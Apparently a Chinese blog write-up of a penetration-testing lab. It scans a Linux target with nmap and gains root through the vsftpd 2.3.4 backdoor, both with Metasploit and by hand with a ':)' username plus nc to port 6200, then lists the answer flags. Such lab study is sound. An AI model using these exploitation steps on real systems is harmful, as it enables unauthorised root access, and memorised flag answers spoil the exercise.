Linux操作系统渗透测试

1.通过本地PC中渗透测试平台Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为FLAG提交;

使用命令nmap -n -T4 -O 172.16.1.8对服务器场景Linux进行操作系统扫描渗透测试,来获得操作系统版本信息

 Flag:Linux 2.6.32 - 3.10

2.通过本地PC中渗透测试平台Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为FLAG提交;

使用命令nmap -sV 172.16.1.8来扫描系统服务及版本号

 扫描结果中并未识别出Mysql的服务版本信息

Flag:Mysql(unauthorized)

3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为FLAG提交;

再次使用命令nmap -sV 172.16.1.8对运行的服务版本号进行扫描,发现了其中运行了ftp服务,并且版本号为2.3.4这个版本存在vsftpd笑脸漏洞,我们通过两种方法对其进行利用

方法一

使用命令msfconsole打开metasploit渗透测试平台

 使用命令search vsftpd_234搜索漏洞利用模块

 然后使用命令use exploit/unix/ftp/vsftpd_234_backdoor调用该模块,再然后使用命令show options查看模块的需要配置的参数

 使用命令set RHOST 172.16.1.8,最后使用命令exploit进行利用

 利用成功,根据题目要求需要获取网站耿根目录下的网页文件的内容,使用命令cat /var/www/html,然后使用cat命令查看该文件

 Flag:zpertgvd

4.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为FLAG提交;

使用命令ls /root查看root目录下的文件

使用命令cd /root切换路径,使用ls命令进行查看Flag:asuorwed.bmp

5.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为FLAG提交。

将根目录下的文件复制到/var/www/html中,然后在渗透机浏览器中打开

 

然后在nc客户端使用命令chmod 777 asuorwed.bmp对该文件进行赋权使得所有用户能够查看

 再然后使用命令firefox打开火狐浏览器,输入地址http://172.16.1.8/asuorwed.bmp

 Flag:sunny

对其进行利用的方法二:

使用命令ftp 172.16.1.8转到ftp认证交互界面

 然后在输入用户名的时候,在后面加上:)一个笑脸符号,再任意输入一个密码

 使用命令nc 172.16.1.8 6200,再启动一个命令终端,然后使用命令id查看当前用户的权限为root

 连接成功同样能够获得root管理员权限

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weixin_43708659

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值